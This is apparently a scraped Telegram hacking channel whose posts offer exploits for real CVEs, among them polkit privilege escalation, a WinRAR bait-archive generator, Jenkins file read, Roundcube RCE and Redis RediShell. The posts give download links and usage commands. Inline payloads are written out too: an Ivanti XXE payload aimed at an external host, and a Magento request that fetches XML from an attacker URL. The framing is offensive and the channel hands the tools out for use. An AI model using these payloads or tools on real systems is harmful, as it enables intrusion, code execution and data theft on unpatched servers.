BugCod3
6.19K subscribers
In the name of God

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
CVE-2021-43258
ChurchInfo 1.2.13-1.3.0 Remote Code Execution Exploit

🌐Github

#CVE #RemoteCode #Exploit #Php

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
CVE-2022-31188_SSRF.txt
1.4 KB
CVAT 2.0 - SSRF (Server Side Request Forgery)

🗂 Description:
#CVAT is an open-source interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a server-side request forgery (SSRF) vulnerability.
Validation has been added to URLs used in the affected code path in version 2.0.0. Users are advised to upgrade.

Type: webapps

💻 Platform: Python

🌐 Vendor Homepage: 🌐Github

🛡 Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)

👑 CVE: CVE-2022-31188

#CVE #SSRF #Exploit #Python

WordPress_Yith_WooCommerce_Gift_Cards_Premium_3_19_0_Shell_Upload.txt
4.2 KB

WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload Vulnerability

Category: web applications

🖥 Platform: php

✉️ Description: Unauthenticated Arbitrary File Upload

Affected Plugin: Yith WooCommerce Gift Cards Premium

Affected Versions: <= 3.19.0

CVE ID: CVE-2022-45359

🪖 CVSS Score: 9.8 (Critical)

🏠 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

🗂️ Size: 🅰🅰🅰📝📝

#CVE #Web_Applications #Php

Control-Web-Panel.txt
3.8 KB
Control Web Panel Unauthenticated Remote Command Execution Exploit

Category: remote exploits

🖥 Platform: linux

🪖 Risk: Security Risk Critical 🚨

🗂️ Size: 🅰🅰🅰📝📝

Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

CVE: CVE-2022-44877

#CVE #Linux #Exploit

CVE-2021-4034

One day for the polkit privilege escalation exploit

Just execute make, ./cve-2021-4034 and enjoy your root shell.

GitHub

#CVE #POC

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
SugarCRM 12.x Remote Code Execution / Shell Upload Exploit

Category: remote exploits

Platform: php

Risk: [Security Risk Critical]

Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.

CVE: CVE-2023-22952

Download

#CVE #Exploit #Rc #Shell

CVE-2020-0796 Remote overflow POC

CVE-2020-0796 is a remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol.

Which devices does the CVE-2020-0796 affect?

+ Windows 10 Version 1903 for 32-bit Systems
+ Windows 10 Version 1903 for ARM64-based Systems
+ Windows 10 Version 1903 for x64-based Systems
+ Windows 10 Version 1909 for 32-bit Systems
+ Windows 10 Version 1909 for ARM64-based Systems
+ Windows 10 Version 1909 for x64-based Systems
+ Windows Server, version 1903 (Server Core installation)
+ Windows Server, version 1909 (Server Core installation)


GitHub
GitHub

#CVE #Microsoft #POC

🪳 CVE-2023-38831 WinRAR exploit generator 🪳

👥 Quick poc test:
Generate the default poc for test
python cve-2023-38831-exp-gen.py poc

or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar


👤 Custom:
⚪️ Place the bait file and the (evil) script file in the current directory; the bait file is recommended to be an image (.png, .jpg) or a document (.pdf)
⚪️ Run
python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

to generate your exploit

👆 Analysis Blog
👁‍🗨 Reference
😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Winrar #Exploit

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "https://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with the SAMLRequest param

#bugbountytips #cve #Ivanti

🦇 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner 🦇

💬 Description:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻 Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>

or
python CVE-2024-23897.py -i <input_file> -f <file>


📊 Parameters:
⚪️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️ -i or --input-file: Path to input file containing hosts in the format of https://1.2.3.4:8080/ (one per line).

⚪️ -o or --output-file: Export results to file (optional).

⚪️ -p or --port: Specify the port number. Default is 8080 (optional).

⚪️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #PoC #Scanner

CNEXT exploits

💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in glibc's iconv()

👁‍🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:

⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...

🗝 Exploits:
Exploits will become available as blogposts come out.

⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #Exploit #Cnext

CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

#CVE #POC

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

💬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable.

Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12

😸 Github

⬇️ Download
🔒 BugCod3

#Python #CVE #Vulnerable #Detection

WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability

📊 Category: web applications

💻 Platform: php

🪖 Risk: Security Risk High 🚨

💬
WordPress A/B Image Optimizer plugin versions 3.3 and below suffer from an arbitrary file download vulnerability.

🔥 CVE: CVE-2025-25163

⬇️ Download
🔒 BugCod3

#CVE #Exploit #PHP #WordPress

CVE-2025-49113 - Roundcube Remote Code Execution

A proof-of-concept exploit for CVE-2025-49113, a remote code execution vulnerability in Roundcube Webmail.

💬 Description:
This exploit targets a deserialization vulnerability in Roundcube Webmail versions 1.5.0 through 1.6.10. The vulnerability allows an authenticated attacker to execute arbitrary code on the server.

🏴‍☠️ Vulnerable Versions:
⚪️ 1.5.0 - 1.5.9
⚪️ 1.6.0 - 1.6.10

🖇 Requirements:
⚪️ PHP 7.0 or higher
⚪️ cURL extension enabled
⚪️ Target running a vulnerable version of Roundcube

💻 Usage:
php CVE-2025-49113.php <url> <username> <password> <command>


🔼 Example:
php CVE-2025-49113.php https://localhost/roundcube/ admin password "id"


Github

⬇️ Download
🔒 BugCod3

#CVE #PHP #RemoteCode

Researchers discovered a critical Redis vulnerability called RediShell 🗡 (CVE-2025-49844), a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis ⚡️

CVE-2025-49844 (RediShell) POC 🛡

Github

#cve #poc #exploit #redishell #redis

Join Exploit Forge 🔝
Join Exploit Forge Forum 👑
Join BugCod3 🤝